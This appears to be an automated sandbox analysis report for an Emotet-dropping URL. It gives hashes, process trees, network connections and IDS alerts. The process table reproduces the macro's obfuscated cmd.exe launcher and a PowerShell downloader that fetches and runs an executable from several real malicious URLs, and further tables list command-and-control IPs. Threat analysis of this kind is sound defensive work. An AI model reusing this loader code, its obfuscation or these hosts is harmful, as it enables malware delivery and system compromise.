Field | Value |
---|---|
URL | http://lutgerink.com/US/Information/12_18 |
Full analysis | https://app.any.run/tasks/650afad8-5125-45cf-98cd-d4748e95c2bd |
Verdict | Malicious activity |
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into very destructive malware. It mostly targets corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date | December 14, 2018, 19:27:11 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | — |
Indicators | — |
MD5 | 1F12FE8C775684F3EC49DCE4823D267E |
SHA1 | 1241E63AB4FCDE77E406625A3407863802ED4A60 |
SHA256 | ED548CD5BBB2228EB56F88B9B8D1EB35FFF7423100D6FB9E74B9DE5A0B399AC2 |
SSDEEP | 3:N1KSQy62KwB/MKLKin:CSjjB/MK+i |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2980 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Internet Explorer; Exit code: 1; Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3144 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2980 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Internet Explorer; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
4020 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\FILE-79892369[1].doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | ||||
3320 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 | ||||
3476 | c:\HaJKihRtkdI\pCXQqijRV\palFkcEZwNzvVU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3852 | CmD /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2708 | C:\Windows\system32\cmd.exe /S /D /c" echo $KSY='QwR';$aLC=new-object Net.WebClient;$cwQ='http://evihdaf.com/syXxoBHdX@http://pingwersen.com/iZTVle9fY@http://ibgd.org/v3uTuE3@http://tevetogluyemek.com.tr/svnkBH2N@http://inwa.net/rUGhAv6jC'.Split('@');$HIT='iSC';$hPl = '749';$IbN='iUO';$sba=$env:temp+'\'+$hPl+'.exe';foreach($jkO in $cwQ){try{$aLC.DownloadFile($jkO, $sba);$CWs='Gzp';If ((Get-Item $sba).length -ge 80000) {Invoke-Item $sba;$BuH='cjf';break;}}catch{}}$CVY='GjZ';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2784 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^|findstr Cons') DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3228 | C:\Windows\system32\cmd.exe /c ftype|findstr Cons | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3508 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2980 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[1].ico | — | — | — |
2980 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | — |
2980 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFD1EB19A4DAF14C45.TMP | — | — | — |
4020 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7FCF.tmp.cvr | — | — | — |
4020 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_75E6E0F6-8AB4-48F4-BB3D-FEBA32466816.0\9F6D67AF.doc\:Zone.Identifier:$DATA | — | — | — |
2980 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF87B8ADD1FB0037AF.TMP | — | — | — |
2980 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{49ECA593-FFD6-11E8-91D7-5254004A04AF}.dat | — | — | — |
4020 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7DDBC95.wmf | — | — | — |
4020 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4D8706B.wmf | — | — | — |
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_75E6E0F6-8AB4-48F4-BB3D-FEBA32466816.0\~DF4CCE46FAC3F7A04B.TMP | — | — | — |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3316 | archivesymbol.exe | GET | — | 190.152.12.86:80 | http://190.152.12.86/ | EC | — | — | malicious |
3316 | archivesymbol.exe | GET | — | 190.146.201.54:80 | http://190.146.201.54/ | CO | — | — | malicious |
3316 | archivesymbol.exe | GET | — | 110.37.219.134:990 | http://110.37.219.134:990/ | PK | — | — | suspicious |
3316 | archivesymbol.exe | GET | — | 152.168.60.9:80 | http://152.168.60.9/ | AR | — | — | malicious |
2312 | powershell.exe | GET | 200 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX/ | US | executable | 156 Kb | malicious |
3144 | iexplore.exe | GET | 301 | 185.96.5.160:80 | http://lutgerink.com/US/Information/12_18 | NL | html | 250 b | suspicious |
3316 | archivesymbol.exe | GET | 200 | 190.189.179.140:8080 | http://190.189.179.140:8080/whoami.php | AR | text | 13 b | malicious |
3144 | iexplore.exe | GET | 200 | 185.96.5.160:80 | http://lutgerink.com/US/Information/12_18/ | NL | document | 52.8 Kb | suspicious |
3316 | archivesymbol.exe | GET | 200 | 181.15.92.18:80 | http://181.15.92.18/whoami.php | AR | text | 13 b | malicious |
2312 | powershell.exe | GET | 301 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX | US | html | 237 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2980 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3316 | archivesymbol.exe | 152.168.60.9:80 | — | CABLEVISION S.A. | AR | malicious |
3144 | iexplore.exe | 185.96.5.160:80 | lutgerink.com | CloudVPS B.V. | NL | suspicious |
2312 | powershell.exe | 162.220.162.40:80 | evihdaf.com | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC | US | malicious |
3316 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
3316 | archivesymbol.exe | 190.152.12.86:80 | — | CORPORACION NACIONAL DE TELECOMUNICACIONES - CNT EP | EC | malicious |
3316 | archivesymbol.exe | 181.15.92.18:80 | — | Telecom Argentina S.A. | AR | malicious |
3316 | archivesymbol.exe | 110.37.219.134:990 | — | National WiMAX/IMS environment | PK | suspicious |
3316 | archivesymbol.exe | 190.189.179.140:8080 | — | Prima S.A. | AR | malicious |
3316 | archivesymbol.exe | 192.185.120.146:587 | mail.skytravelsv.com | CyrusOne LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.bing.com | — | whitelisted |
lutgerink.com | — | suspicious |
evihdaf.com | — | malicious |
mail.reladi.com.mx | — | unknown |
imap.gmail.com | — | shared |
mail.grupoquimicocontreras.com.mx | — | unknown |
mail.ciemsa-mty.com.mx | — | unknown |
mail.ledneonchile.cl | — | suspicious |
watermelon.nocdirect.com | — | unknown |
a2plcpnl0344.prod.iad2.secureserver.net | — | unknown |
PID | Process | Class | Message |
---|---|---|---|
3144 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) |
3144 | iexplore.exe | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript |
3144 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY Office Document Download Containing AutoOpen Macro |
3144 | iexplore.exe | Attempted User Privilege Gain | SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt |
2312 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2312 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2312 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2312 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2312 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3316 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |